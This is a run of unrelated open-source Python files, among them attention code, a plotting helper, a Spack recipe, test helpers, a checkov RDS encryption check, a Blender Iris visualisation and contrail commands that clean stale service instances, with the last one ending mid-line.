encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
attention_weighted_encoder_context_t_prev,
scope,
):
weighted_prev_attention_context = _apply_fc_weight_for_sum_match(
model=model,
input=attention_weighted_encoder_context_t_prev,
dim_in=encoder_output_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_prev_attention_context'
)
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state'
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum_tmp = model.net.Add(
[
weighted_encoder_outputs,
weighted_decoder_hidden_state
],
s(scope, 'decoder_hidden_encoder_outputs_sum_tmp'),
broadcast=1,
use_grad_hack=1,
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[
decoder_hidden_encoder_outputs_sum_tmp,
weighted_prev_attention_context
],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum_tmp,
decoder_hidden_encoder_outputs_sum
]
def apply_regular_attention(
model,
encoder_output_dim,
encoder_outputs_transposed,
weighted_encoder_outputs,
decoder_hidden_state_t,
decoder_hidden_state_dim,
scope,
):
weighted_decoder_hidden_state = _apply_fc_weight_for_sum_match(
model=model,
input=decoder_hidden_state_t,
dim_in=decoder_hidden_state_dim,
dim_out=encoder_output_dim,
scope=scope,
name='weighted_decoder_hidden_state'
)
# [encoder_length, batch_size, encoder_output_dim]
decoder_hidden_encoder_outputs_sum = model.net.Add(
[weighted_encoder_outputs, weighted_decoder_hidden_state],
s(scope, 'decoder_hidden_encoder_outputs_sum'),
broadcast=1,
use_grad_hack=1,
)
attention_logits_transposed = _calc_attention_logits_from_sum_match(
model=model,
decoder_hidden_encoder_outputs_sum=decoder_hidden_encoder_outputs_sum,
encoder_output_dim=encoder_output_dim,
scope=scope
)
# [batch_size, encoder_length, 1]
attention_weights_3d = _calc_attention_weights(
model=model,
attention_logits_transposed=attention_logits_transposed,
scope=scope
)
# [batch_size, encoder_output_dim, 1]
attention_weighted_encoder_context = _calc_weighted_context(
model=model,
encoder_outputs_transposed=encoder_outputs_transposed,
encoder_output_dim=encoder_output_dim,
attention_weights_3d=attention_weights_3d,
scope=scope
)
return attention_weighted_encoder_context, attention_weights_3d, [
decoder_hidden_encoder_outputs_sum
]
|
the-stack_106_16918
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (c) The James Hutton Institute 2017-2019
# (c) The University of Strathclyde 2019
# Author: Leighton Pritchard
#
# Contact:
# [email protected]
#
# Leighton Pritchard,
# Strathclyde Institute of Pharmaceutical and Biomedical Sciences
# The University of Strathclyde
# Cathedral Street
# Glasgow
# G1 1XQ
# Scotland,
# UK
#
# The MIT License
#
# Copyright (c) 2017-2018 The James Hutton Institute
# (c) The University of Strathclyde 2019
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Code to implement graphics output for ANI analyses."""
# Force matplotlib NOT to use an Xwindows backend on *nix, so that
# _tkinter.TclError is avoided when there is no $DISPLAY env: this can occur
# when running the package/script via ssh
# See http://stackoverflow.com/questions/2801882/\
# generating-a-png-with-matplotlib-when-display-is-undefined
# This needs to be done before importing pyplot
from typing import Dict, Optional, Tuple
import matplotlib # pylint: disable=C0411
from . import mpl # noqa: F401 # matplotlib wrappers
from . import sns # noqa: F401 # seaborn wrappers
# Specify matplotlib backend. This *must* be done before pyplot import, but
# raises errors with flake8 etc. So we comment out the specific error
matplotlib.use("Agg")
import matplotlib.pyplot as plt # noqa: E402,E501 # pylint: disable=wrong-import-position,wrong-import-order
# Convenience class to hold heatmap graphics parameters
class Params: # pylint: disable=too-few-public-methods
"""Convenience class to hold heatmap rendering parameters."""
def __init__(
self,
params: Tuple,
labels: Optional[Dict] = None,
classes: Optional[Dict] = None,
):
"""Instantiate class.
        :param params: tuple of (colormap name, vmin, vmax) for the heatmap
        :param labels: optional dict of labels for the heatmap rows/columns
        :param classes: optional dict of class groupings for the heatmap
"""
self.cmap = plt.get_cmap(params[0])
self.vmin = params[1]
self.vmax = params[2]
self.labels = labels
self.classes = classes
@property
def vdiff(self):
"""Return difference between max and min values for presentation."""
return max(0.01, self.vmax - self.vmin)
|
the-stack_106_16919
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class SicmHigh(CMakePackage):
"""SICM's high-level interface. Seeks to automatically
profile and manage memory usage on heterogeneous memory systems."""
homepage = "https://github.com/lanl/SICM/"
git = "https://github.com/lanl/SICM"
version('develop', commit='HEAD')
depends_on('flang@20180921', patches=['0.patch', '1.patch', '2.patch', '3.patch'])
depends_on('[email protected]+je', patches=['jemalloc_maxarenas1.patch', 'jemalloc_maxarenas2.patch'])
depends_on('numactl')
depends_on('libpfm4')
def cmake_args(self):
args = ['-DSICM_BUILD_HIGH_LEVEL=True']
return args
    # Run "make test" after the build target.
@run_after('build')
@on_package_attributes(run_tests=True)
def check_build(self):
make("test")
|
the-stack_106_16920
|
import pathlib
import random
import shutil
import subprocess
import sys
from abc import abstractmethod
from dataclasses import dataclass
from typing import Dict, Tuple, Callable
import tabsave
TEST_ROOT_DIR = pathlib.Path.home() / '.tabsave_test'
TEST_GAME_SAVE_DIR = TEST_ROOT_DIR / 'They Are Billions' / 'Saves'
CONFIG_FILE_PATH = TEST_ROOT_DIR / tabsave.CONFIG_FILE_NAME
class RunResult:
def __init__(self, return_value=None, exception=None):
self.return_value = return_value
self.exception = exception
def __str__(self):
return {'return_value': self.return_value, 'exception': self.exception}.__str__()
def __repr__(self):
return {'return_value': self.return_value, 'exception': self.exception}.__repr__()
def __eq__(self, other):
if not isinstance(other, RunResult):
return False
else:
return all(getattr(self, attr) == getattr(other, attr) for attr in ['return_value', 'exception'])
class Runnable:
"""A class that creates a callable that has pre-defined arguments"""
def __repr__(self):
return self.__str__()
def __str__(self):
return f"{{callable: {self._dict['callable'].__name__}, args: {self._dict['args']}, " \
f"kwargs: {self._dict['kwargs']}}}"
def __init__(self, callable_to_run: Callable, *args, **kwargs):
self._dict = {'callable': callable_to_run,
'args': args,
'kwargs': kwargs}
def __call__(self, *args, **kwargs):
return_value = None
exception = None
args = (*self._dict['args'], *args)
tmp = kwargs
kwargs = self._dict['kwargs'].copy()
kwargs.update(tmp)
del tmp
try:
return_value = self._dict['callable'](*args, **kwargs)
except Exception as e:
exception = e
return RunResult(return_value, exception)
def before_all(context):
# setup context
context.results = []
def _add_result(r: Runnable):
result = r()
context.results.append(result)
return result
context.add_result = _add_result
def before_scenario(context, scenario):
# change the config path to a test location
tabsave.Config._test_setup(CONFIG_FILE_PATH)
# setup context
context.results = []
# create the test game save directory
TEST_GAME_SAVE_DIR.mkdir(parents=True, exist_ok=True)
# create config file if we are not testing its creation
if 'config_setup_test' not in scenario.tags:
config_dir_path_str = TEST_GAME_SAVE_DIR.resolve()
# create the config file
with open(CONFIG_FILE_PATH, 'w') as file:
file.write(f'save_dir: {config_dir_path_str}\n')
def after_scenario(context, feature):
# delete the test directory and all of its files
shutil.rmtree(TEST_ROOT_DIR)
def game_save_exists(save_name: str) -> bool:
return all((TEST_GAME_SAVE_DIR / f'{save_name}{ending}').is_file() for ending in ('.zxcheck', '.zxsav'))
def game_save_backup_exists(save_name) -> bool:
return all((TEST_GAME_SAVE_DIR / f'{save_name}{ending}').is_file() for ending
in ('_Backup.zxcheck', '_Backup.zxsav'))
def create_game_save(save_name: str, create_backupzx_files=False) -> Dict[pathlib.Path, int]:
endings = ('.zxcheck', '.zxsav', '_Backup.zxcheck', '_Backup.zxsav') if create_backupzx_files \
else ('.zxcheck', '.zxsav')
d = {}
for ending in endings:
random_int = random.randint(0, 1000000)
path = TEST_GAME_SAVE_DIR / f'{save_name}{ending}'
d[path] = random_int
with open(path, 'w') as file:
file.write(f"{save_name} - {random_int}\n")
return d
def remove_game_saves(save_name: str):
endings = ('.zxcheck', '.zxsav', '_Backup.zxcheck', '_Backup.zxsav')
for ending in endings:
path = TEST_GAME_SAVE_DIR / f'{save_name}{ending}'
if path.is_file():
path.unlink()
def get_argument_list(raw_str: str) -> Tuple[str, ...]:
args = []
arg = []
escaped = False
current_quote = ''
for ch in raw_str:
if escaped:
arg.append(ch)
escaped = False
else:
if ch == '\\':
escaped = True
elif current_quote:
if ch != current_quote:
arg.append(ch)
else:
args.append(''.join(arg))
arg = []
current_quote = ''
elif ch == ' ':
if arg:
args.append(''.join(arg))
arg = []
else:
... # it's leading whitespace, just ignore it.
elif ch in ['"', "'"] and not arg: # leading quote
current_quote = ch
else:
arg.append(ch)
if arg:
args.append(''.join(arg))
arg = []
if current_quote:
raise ValueError(f'<{raw_str}> could not be parsed because of an unclosed {current_quote} quotation mark.')
return tuple((arg for arg in args if isinstance(arg, str)))
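# Usage sketch: quoted arguments stay together and a backslash escapes the next character.
#
#   get_argument_list('backup "my save" --keep 3')
#   # -> ('backup', 'my save', '--keep', '3')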
def get_next_run_result(context) -> RunResult:
return context.results.pop(0)
|
the-stack_106_16921
|
from checkov.common.models.enums import CheckCategories, CheckResult
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class RDSClusterSnapshotEncrypted(BaseResourceValueCheck):
def __init__(self):
name = "Ensure that RDS database cluster snapshot is encrypted"
id = "CKV_AWS_153"
supported_resources = ['aws_db_cluster_snapshot']
categories = [CheckCategories.ENCRYPTION]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'storage_encrypted'
check = RDSClusterSnapshotEncrypted()
|
the-stack_106_16922
|
"""
A trainer class.
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
from model.aggcn import GCNClassifier
from utils import torch_utils
class Trainer(object):
def __init__(self, opt, emb_matrix=None):
raise NotImplementedError
def update(self, batch):
raise NotImplementedError
def predict(self, batch):
raise NotImplementedError
def update_lr(self, new_lr):
torch_utils.change_lr(self.optimizer, new_lr)
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.opt = checkpoint['config']
def save(self, filename, epoch):
params = {
'model': self.model.state_dict(),
'config': self.opt,
}
try:
torch.save(params, filename)
print("model saved to {}".format(filename))
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def unpack_batch(batch, cuda):
if cuda:
inputs = [Variable(b.cuda()) for b in batch[:10]]
labels = Variable(batch[10].cuda())
else:
inputs = [Variable(b) for b in batch[:10]]
labels = Variable(batch[10])
tokens = batch[0]
head = batch[5]
subj_pos = batch[6]
obj_pos = batch[7]
lens = batch[1].eq(0).long().sum(1).squeeze()
return inputs, labels, tokens, head, subj_pos, obj_pos, lens
class GCNTrainer(Trainer):
def __init__(self, opt, emb_matrix=None):
self.opt = opt
self.emb_matrix = emb_matrix
self.model = GCNClassifier(opt, emb_matrix=emb_matrix)
self.criterion = nn.CrossEntropyLoss()
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
if opt['cuda']:
self.model.cuda()
self.criterion.cuda()
self.optimizer = torch_utils.get_optimizer(opt['optim'], self.parameters, opt['lr'])
def update(self, batch):
inputs, labels, tokens, head, subj_pos, obj_pos, lens = unpack_batch(batch, self.opt['cuda'])
# step forward
self.model.train()
self.optimizer.zero_grad()
logits, pooling_output = self.model(inputs)
loss = self.criterion(logits, labels)
# l2 decay on all conv layers
if self.opt.get('conv_l2', 0) > 0:
loss += self.model.conv_l2() * self.opt['conv_l2']
# l2 penalty on output representations
if self.opt.get('pooling_l2', 0) > 0:
loss += self.opt['pooling_l2'] * (pooling_output ** 2).sum(1).mean()
loss_val = loss.item()
# backward
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.opt['max_grad_norm'])
self.optimizer.step()
return loss_val
def predict(self, batch, unsort=True):
inputs, labels, tokens, head, subj_pos, obj_pos, lens = unpack_batch(batch, self.opt['cuda'])
orig_idx = batch[11]
# forward
self.model.eval()
logits, _ = self.model(inputs)
loss = self.criterion(logits, labels)
probs = F.softmax(logits, 1).data.cpu().numpy().tolist()
predictions = np.argmax(logits.data.cpu().numpy(), axis=1).tolist()
if unsort:
_, predictions, probs = [list(t) for t in zip(*sorted(zip(orig_idx,\
predictions, probs)))]
return predictions, probs, loss.item()
|
the-stack_106_16923
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from typing import Any, TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
from .._version import VERSION
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
class ComputeManagementClientConfiguration(Configuration):
"""Configuration for ComputeManagementClient.
Note that all parameters used to create this instance are saved as instance
attributes.
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription credentials which uniquely identify Microsoft Azure subscription. The subscription ID forms part of the URI for every service call.
:type subscription_id: str
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
**kwargs # type: Any
) -> None:
if credential is None:
raise ValueError("Parameter 'credential' must not be None.")
if subscription_id is None:
raise ValueError("Parameter 'subscription_id' must not be None.")
super(ComputeManagementClientConfiguration, self).__init__(**kwargs)
self.credential = credential
self.subscription_id = subscription_id
self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
kwargs.setdefault('sdk_moniker', 'azure-mgmt-compute/{}'.format(VERSION))
self._configure(**kwargs)
def _configure(
self,
**kwargs: Any
) -> None:
self.user_agent_policy = kwargs.get('user_agent_policy') or policies.UserAgentPolicy(**kwargs)
self.headers_policy = kwargs.get('headers_policy') or policies.HeadersPolicy(**kwargs)
self.proxy_policy = kwargs.get('proxy_policy') or policies.ProxyPolicy(**kwargs)
self.logging_policy = kwargs.get('logging_policy') or policies.NetworkTraceLoggingPolicy(**kwargs)
self.http_logging_policy = kwargs.get('http_logging_policy') or ARMHttpLoggingPolicy(**kwargs)
self.retry_policy = kwargs.get('retry_policy') or policies.AsyncRetryPolicy(**kwargs)
self.custom_hook_policy = kwargs.get('custom_hook_policy') or policies.CustomHookPolicy(**kwargs)
self.redirect_policy = kwargs.get('redirect_policy') or policies.AsyncRedirectPolicy(**kwargs)
self.authentication_policy = kwargs.get('authentication_policy')
if self.credential and not self.authentication_policy:
self.authentication_policy = policies.AsyncBearerTokenCredentialPolicy(self.credential, *self.credential_scopes, **kwargs)
|
the-stack_106_16924
|
from sentiment import TweetAnalyser
from unittest.mock import patch
from unittest import mock
import pytest
def test_classify_tweet():
ta = TweetAnalyser("matthieu_run")
result = ta.classify_tweet("All is happy and well.")
assert result == 1
@patch("sentiment.pickle")
@patch("sentiment.os.path.abspath")
def test_set_classifier(mock_os_abspath, mock_pickle):
mock_os_abspath.return_value = (
"C:\\Users\\matth\\source\\repos\\sentiment_analyst\\sentiment_analyst\\ELSE.py"
)
mo = mock.mock_open(read_data="1")
with patch("builtins.open", mo):
TweetAnalyser("matthieu_run")
mo.assert_called_once()
mock_pickle.load.assert_called_once()
class TestTweet:
def __init__(self, tweet):
self.text = tweet
@pytest.mark.parametrize(
"new_tweets, expected_result",
[
(
[
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
TestTweet("happy"),
],
"positive",
),
(
[
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
TestTweet("sad"),
],
"negative",
),
],
)
@patch("sentiment.tweepy")
def test_main(mock_tweepy, new_tweets, expected_result):
ta = TweetAnalyser("matthieu_run")
mock_api = mock.MagicMock()
mock_tweepy.API.return_value = mock_api
mock_api.user_timeline.return_value = new_tweets
result = ta.main()
mock_tweepy.OAuthHandler.assert_called_once()
assert (
result
== f"The last 5 tweets of matthieu_run have generally been {expected_result}"
)
|
the-stack_106_16925
|
import datetime
from pathlib import Path
import pytest
from dateutil.parser import isoparse
from pystarport.ports import rpc_port
from .utils import (
cluster_fixture,
wait_for_block_time,
wait_for_new_blocks,
wait_for_port,
)
"""
slashing testing
"""
# use custom cluster, use an unique base port
@pytest.fixture(scope="module")
def cluster(worker_index, pytestconfig, tmp_path_factory):
"override cluster fixture for this test module"
yield from cluster_fixture(
Path(__file__).parent / "configs/slashing.yaml",
worker_index,
tmp_path_factory.mktemp("data"),
quiet=pytestconfig.getoption("supervisord-quiet"),
)
@pytest.mark.slow
def test_slashing(cluster):
"stop node2, wait for non-live slashing"
addr = cluster.address("validator", i=2)
val_addr = cluster.address("validator", i=2, bech="val")
tokens1 = int((cluster.validator(val_addr))["tokens"])
print("tokens before slashing", tokens1)
print("stop and wait for 10 blocks")
cluster.supervisor.stopProcess(f"{cluster.chain_id}-node2")
wait_for_new_blocks(cluster, 10)
cluster.supervisor.startProcess(f"{cluster.chain_id}-node2")
wait_for_port(rpc_port(cluster.base_port(2)))
val = cluster.validator(val_addr)
tokens2 = int(val["tokens"])
print("tokens after slashing", tokens2)
assert tokens2 == int(tokens1 * 0.99), "slash amount is not correct"
assert val["jailed"], "validator is jailed"
# try to unjail
rsp = cluster.unjail(addr, i=2)
assert rsp["code"] == 4, "still jailed, can't be unjailed"
# wait for 60s and unjail again
wait_for_block_time(
cluster, isoparse(val["unbonding_time"]) + datetime.timedelta(seconds=60)
)
rsp = cluster.unjail(addr, i=2)
assert rsp["code"] == 0, f"unjail should success {rsp}"
wait_for_new_blocks(cluster, 3)
assert len(cluster.validators()) == 3
|
the-stack_106_16927
|
import bpy
import bmesh
import os
import numpy as np
import utils
from mathutils import Vector, Matrix
from math import pi
def PCA(data, num_components=None):
# mean center the data
data -= data.mean(axis=0)
# calculate the covariance matrix
R = np.cov(data, rowvar=False)
# calculate eigenvectors & eigenvalues of the covariance matrix
# use 'eigh' rather than 'eig' since R is symmetric,
# the performance gain is substantial
V, E = np.linalg.eigh(R)
# sort eigenvalue in decreasing order
idx = np.argsort(V)[::-1]
E = E[:,idx]
# sort eigenvectors according to same index
V = V[idx]
# select the first n eigenvectors (n is desired dimension
# of rescaled data array, or dims_rescaled_data)
E = E[:, :num_components]
# carry out the transformation on the data using eigenvectors
# and return the re-scaled data, eigenvalues, and eigenvectors
return np.dot(E.T, data.T).T, V, E
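# Usage sketch: project random 4-D points onto their two leading principal
# components (PCA mean-centres `data` in place, hence the copy).
#
#   data = np.random.rand(100, 4)
#   projected, eigenvalues, eigenvectors = PCA(data.copy(), num_components=2)
#   # projected.shape == (100, 2)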
def load_iris():
try:
# Load Iris dataset from the sklearn.datasets package
from sklearn import datasets
from sklearn import decomposition
# Load Dataset
iris = datasets.load_iris()
X = iris.data
y = iris.target
labels = iris.target_names
# Reduce components by Principal Component Analysis from sklearn
X = decomposition.PCA(n_components=3).fit_transform(X)
except ImportError:
# Load Iris dataset manually
path = os.path.join('data', 'iris', 'iris.data')
iris_data = np.genfromtxt(path, dtype='str', delimiter=',')
X = iris_data[:, :4].astype(dtype=float)
y = np.ndarray((X.shape[0],), dtype=int)
# Create target vector y and corresponding labels
labels, idx = [], 0
for i, label in enumerate(iris_data[:, 4]):
label = label.split('-')[1]
if label not in labels:
labels.append(label); idx += 1
y[i] = idx - 1
# Reduce components by implemented Principal Component Analysis
X = PCA(X, 3)[0]
return X, y, labels
def createScatter(X, y, size=0.25):
labelIndices = set(y)
colors = [(1, 0, 0), (0, 1, 0), (0, 0, 1), \
(1, 1, 0), (1, 0, 1), (0, 1, 1)]
# Create a bmesh for each label
bmList = []
for labelIdx in labelIndices:
bmList.append(bmesh.new())
# Iterate through all the vectors and targets
for x, labelIdx in zip(X, y):
# Use the vector as translation for each point
T = Matrix.Translation(x)
if labelIdx % 3 == 0:
bmesh.ops.create_cube(bmList[labelIdx],
size=size, matrix=T)
elif labelIdx % 3 == 1:
bmesh.ops.create_icosphere(bmList[labelIdx],
diameter=size/2, matrix=T)
else:
bmesh.ops.create_cone(bmList[labelIdx],
segments=6, cap_ends=True,
diameter1=size/2, diameter2=0,
depth=size, matrix=T)
objects = []
for labelIdx, color in zip(labelIndices, colors):
# Create a mesh from the existing bmesh
mesh = bpy.data.meshes.new('ScatterMesh {}'.format(labelIdx))
bmList[labelIdx].to_mesh(mesh)
bmList[labelIdx].free()
# Create a object with the mesh and link it to the scene
obj = bpy.data.objects.new('ScatterObject {}'.format(labelIdx), mesh)
bpy.context.scene.objects.link(obj)
# Create materials for each bmesh
mat = bpy.data.materials.new('ScatterMaterial {}'.format(labelIdx))
mat.diffuse_color = color
mat.diffuse_intensity = 0.5
mat.specular_intensity = 0.0
obj.data.materials.append(mat)
objects.append(obj)
def createLabels(X, y, labels, cameraObj=None):
labelIndices = set(y)
objects = []
# Draw labels
for labelIdx in labelIndices:
center = np.sum([x for x, idx in zip(X, y) \
if idx == labelIdx], axis=0)
counts = (y == labelIdx).sum()
center = Vector(center) / counts
label = labels[labelIdx]
fontCurve = bpy.data.curves.new(type="FONT", name=label)
fontCurve.body = label
fontCurve.align_x = 'CENTER'
fontCurve.align_y = 'BOTTOM'
fontCurve.size = 0.6
obj = bpy.data.objects.new("Label {}".format(label), fontCurve)
obj.location = center + Vector((0, 0, 0.8))
obj.rotation_mode = 'AXIS_ANGLE'
obj.rotation_axis_angle = (pi/2, 1, 0, 0)
bpy.context.scene.objects.link(obj)
if cameraObj is not None:
constraint = obj.constraints.new('LOCKED_TRACK')
constraint.target = cameraObj
constraint.track_axis = 'TRACK_Z'
constraint.lock_axis = 'LOCK_Y'
objects.append(obj)
bpy.context.scene.update()
return objects
if __name__ == '__main__':
# Remove all elements
utils.removeAll()
# Set ambient occlusion
utils.setAmbientOcclusion()
# Create camera and lamp
targetObj, cameraObj, lampObj = utils.simpleScene(
(0, 0, 0), (6, 6, 3.5), (-5, 5, 10))
# Make target as parent of camera
cameraObj.parent = targetObj
# Set number of frames
bpy.context.scene.frame_end = 50
# Animate rotation of target by keyframe animation
targetObj.rotation_mode = 'AXIS_ANGLE'
targetObj.rotation_axis_angle = (0, 0, 0, 1)
targetObj.keyframe_insert(data_path='rotation_axis_angle', index=-1,
frame=bpy.context.scene.frame_start)
targetObj.rotation_axis_angle = (2*pi, 0, 0, 1)
# Set last frame to one frame further to have an animation loop
targetObj.keyframe_insert(data_path='rotation_axis_angle', index=-1,
frame=bpy.context.scene.frame_end + 1)
# Change each created keyframe point to linear interpolation
for fcurve in targetObj.animation_data.action.fcurves:
for keyframe in fcurve.keyframe_points:
keyframe.interpolation = 'LINEAR'
X, y, labels = load_iris()
createScatter(X, y)
createLabels(X, y, labels, cameraObj)
# Create a grid
bpy.ops.mesh.primitive_grid_add(
radius=3,
location=(0, 0, 0),
x_subdivisions=15,
y_subdivisions=15)
grid = bpy.context.active_object
# Create grid material
gridMat = bpy.data.materials.new('GridMaterial')
gridMat.type = 'WIRE'
gridMat.use_transparency = True
gridMat.alpha = 0.3
grid.data.materials.append(gridMat)
utils.renderToFolder('frames', 'fisher_iris_visualization', 500, 500,
animation=True)
|
the-stack_106_16928
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from contrail_api_cli.utils import printo, parallel_map
from contrail_api_cli.exceptions import ResourceNotFound
from ..utils import CheckCommand, PathCommand
class CleanSIScheduling(CheckCommand, PathCommand):
    """On some occasions an SI VM can be scheduled on multiple virtual-routers.
    In such a case the command will remove extraneous VR links from the SI VM::
contrail-api-cli --ns contrail_api_cli.clean clean-si-scheduling [service-instance/uuid]
``--check`` and ``--dry-run`` options are available.
"""
description = "Clean bad vrouter scheduling"
@property
def resource_type(self):
return "service-instance"
def _clean_vm(self, vm):
for vr in vm.get('virtual_router_back_refs')[1:]:
if not self.dry_run:
vm.remove_back_ref(vr)
printo("Removed %s from %s" % (vr.fq_name, vm.uuid))
def _check_si(self, si):
try:
si.fetch()
except ResourceNotFound:
return
for vm in si.get('virtual_machine_back_refs', []):
vm.fetch()
if len(vm.get('virtual_router_back_refs', [])) > 1:
printo('SI %s VM %s is scheduled on %s' %
(si.path, vm.uuid, ", ".join([
str(vr.fq_name)
for vr in vm['virtual_router_back_refs']
])))
if self.check is not True:
self._clean_vm(vm)
def __call__(self, paths=None, **kwargs):
super(CleanSIScheduling, self).__call__(**kwargs)
parallel_map(self._check_si, self.resources, workers=50)
class CleanStaleSI(CheckCommand, PathCommand):
"""Clean stale service instances.
SIs are considered stale when:
* LBaaS SI has no pool
* LBaaS SI pool has no VIP
    * LBaaS SI VIP has no instance-ip
* SNAT SI has no logical-router
To run the command::
contrail-api-cli --ns contrail_api_cli.ns clean-stale-si [service-instance/uuid]
``--check`` and ``--dry-run`` options are available.
"""
description = "Clean stale SIs"
@property
def resource_type(self):
return "service-instance"
def _is_stale_snat(self, si):
"""Return True if the snat SI is stale.
"""
if 'logical_router_back_refs' not in si:
printo('[%s] No logical router attached to SI' % si.uuid)
return True
return False
def _is_stale_lbaas(self, si):
"""Return True if the lbaas SI is stale.
"""
if (('loadbalancer_pool_back_refs' not in si or
len(si['loadbalancer_pool_back_refs']) == 0) and
('loadbalancer_back_refs' not in si or
len(si['loadbalancer_back_refs']) == 0)):
printo('[%s] No pool or loadbalancer attached to SI' % si.uuid)
return True
# lbaas v1
if 'loadbalancer_pool_back_refs' in si:
pool = si['loadbalancer_pool_back_refs'][0]
pool.fetch()
if 'virtual_ip_back_refs' not in pool:
printo('[%s] No VIP attached to pool' % si.uuid)
return True
vip = pool['virtual_ip_back_refs'][0]
vip.fetch()
if 'virtual_machine_interface_refs' not in vip:
printo('[%s] No VMI for VIP' % si.uuid)
return True
vip_vmi = vip['virtual_machine_interface_refs'][0]
vip_vmi.fetch()
if 'instance_ip_back_refs' not in vip_vmi:
printo('[%s] No IIP found for VIP VMI' % si.uuid)
return True
return False
def _remove_back_ref(self, si, r1, r2):
printo('[%s] Remove back_ref from %s to %s' % (si.uuid, str(r1.path),
str(r2.path)))
if not self.dry_run:
r1.remove_back_ref(r2)
def _delete_res(self, si, r):
printo('[%s] Delete %s' % (si.uuid, str(r.path)))
if not self.dry_run:
r.delete()
def _clean_lbaas_si(self, si):
printo('[%s] Cleaning stale lbaas' % si.uuid)
for pool in si.get('loadbalancer_pool_back_refs', []):
pool.fetch()
for vip in pool.get('virtual_ip_back_refs', []):
vip.fetch()
vip_vmis = vip.get('virtual_machine_interface_refs', [])
self._delete_res(si, vip)
for vmi in vip_vmis:
self._delete_res(si, vmi)
self._remove_back_ref(si, si, pool)
def _clean_si(self, si):
for vm in si.get('virtual_machine_back_refs', []):
vm.fetch()
for vr in vm.get('virtual_router_back_refs', []):
self._remove_back_ref(si, vm, vr)
for vmi in vm.get('virtual_machine_interface_back_refs', []):
vmi.fetch()
for fip in vmi.get('floating_ip_back_refs', []):
fip.fetch()
if len(fip['virtual_machine_interface_refs']) > 1:
self._remove_back_ref(si, vmi, fip)
else:
self._delete_res(si, fip)
for iip in vmi.get('instance_ip_back_refs', []):
iip.fetch()
if len(iip['virtual_machine_interface_refs']) > 1:
self._remove_back_ref(si, vmi, iip)
else:
self._delete_res(si, iip)
self._delete_res(si, vmi)
self._delete_res(si, vm)
self._delete_res(si, si)
def _check_si(self, si):
si.fetch()
try:
si_t = si['service_template_refs'][0]
except (KeyError, IndexError):
printo('[%s] SI %s has no template, skipping.' % (si.uuid,
str(si.path)))
return
if ('haproxy-loadbalancer-template' in si_t.fq_name and
self._is_stale_lbaas(si)):
printo('[%s] Found stale lbaas %s' % (si.uuid, str(si.fq_name)))
if self.check is not True:
self._clean_lbaas_si(si)
self._clean_si(si)
if 'netns-snat-template' in si_t.fq_name and self._is_stale_snat(si):
